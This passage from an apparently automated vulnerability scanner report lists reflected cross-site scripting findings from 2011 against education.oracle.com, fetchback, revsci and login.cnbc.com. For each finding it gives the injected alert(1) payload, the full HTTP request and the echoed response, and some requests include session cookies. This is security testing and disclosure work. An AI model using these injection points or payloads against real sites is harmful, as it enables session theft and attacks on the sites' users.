Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819943764065,1)
Content-Length: 3769
Date: Tue, 06 Sep 2011 15:55:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<a b=c>c97d7ad58db -->
...[SNIP]...

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56fe7"%3balert(1)//452b678fc04 was submitted in the p_lang parameter. This input was echoed as 56fe7";alert(1)//452b678fc04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=&p_org_id=&p_lang=56fe7"%3balert(1)//452b678fc04 HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057828533965601,0)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7";alert(1)//452b678fc04&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&cust_region=&cust_
...[SNIP]...

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_wddi_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d8a"%3balert(1)//25f551d98f2 was submitted in the p_wddi_id parameter. This input was echoed as e4d8a";alert(1)//25f551d98f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=e4d8a"%3balert(1)//25f551d98f2&p_org_id=&p_lang= HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057875778605369,1)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=e4d8a";alert(1)//25f551d98f2&p_org_id=&p_lang=&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&
...[SNIP]...

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ec"><script>alert(1)</script>4d22a5b224d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=USd40ec"><script>alert(1)</script>4d22a5b224d HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057776994499472,1)
Content-Length: 950
Date: Tue, 06 Sep 2011 16:01:50 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
USd40ec"><script>alert(1)</script>4d22a5b224d
_rd_temp_config.js">
...[SNIP]...

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4202e"%3balert(1)//231562bd186 was submitted in the lang parameter. This input was echoed as 4202e";alert(1)//231562bd186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=US4202e"%3balert(1)//231562bd186 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057768404565213,0)
Content-Length: 920
Date: Tue, 06 Sep 2011 16:01:51 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "US4202e";alert(1)//231562bd186"</SCRIPT>
...[SNIP]...

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/show_desc.redirect

Issue detail

The value of the p_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6e2"><script>alert(1)</script>818bc7ecf2f was submitted in the p_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2"><script>alert(1)</script>818bc7ecf2f HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057845713838882,1)
Content-Length: 1022
Date: Tue, 06 Sep 2011 15:59:36 GMT

<HTML>
<HEAD>
<TITLE>Catalog Search Results</TITLE>
<SCRIPT language=JavaScript>document.domain="oracle.com"</SCRIPT>
<SCRIPT language=JavaScript>var site_section = "Search"</SCRIPT>
<script language=
...[SNIP]...
<FRAME SRC="
/pls/web_prod-plq-dad
/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2"><script>alert(1)</script>818bc7ecf2f
" NAME="content" MARGINWIDTH=5 MARGINHEIGHT=0 SCROLLING=AUTO>
...[SNIP]...

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f6e"><script>alert(1)</script>33d02dcf400 was submitted in the p_lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e262f6e"><script>alert(1)</script>33d02dcf400 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 19101
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=200136460310,1)
Date: Tue, 06 Sep 2011 16:02:10 GMT


<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
TD.selected {BACKGROUND-COLOR: #CCCC99}
TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
UScd6e262f6e"><script>alert(1)</script>33d02dcf400
_rd_temp_config.js">
...[SNIP]...

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76780"%3balert(1)//43d7466ae8e was submitted in the p_lang parameter. This input was echoed as 76780";alert(1)//43d7466ae8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780"%3balert(1)//43d7466ae8e HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 18996
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=216172922120704642,1)
Date: Tue, 06 Sep 2011 16:02:12 GMT


<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
TD.selected {BACKGROUND-COLOR: #CCCC99}
TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "UScd6e276780";alert(1)//43d7466ae8e"</SCRIPT>
...[SNIP]...

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b161b"-alert(1)-"550e756bc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:23 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321223_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:23 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:23 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 235

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3925"-alert(1)-"281d83ef8c3 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321222_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:22 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 232

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.41. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ae529<script>alert(1)</script>55e88475fb6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F09828ae529<script>alert(1)</script>55e88475fb6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 16:45:35 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 07 Sep 2011 16:45:35 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F09828AE529<SCRIPT>ALERT(1)</SCRIPT>55E88475FB6" was not recognized.
*/

3.42. https://login.cnbc.com/cas/login [apphome parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The value of the apphome request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5c0"><script>alert(1)</script>0f8cf36ce47 was submitted in the apphome parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:10 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
rm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription">
...[SNIP]...

3.43. https://login.cnbc.com/cas/login [jsessionid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9cd"><script>alert(1)</script>792007f2f0 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register">
...[SNIP]...

3.44. https://login.cnbc.com/cas/login [login_view parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The value of the login_view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f224b"><script>alert(1)</script>829e8aaba58 was submitted in the login_view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:11 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58">
...[SNIP]...

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55fd4'><script>alert(1)</script>bb9117bee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&55fd4'><script>alert(1)</script>bb9117bee86=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

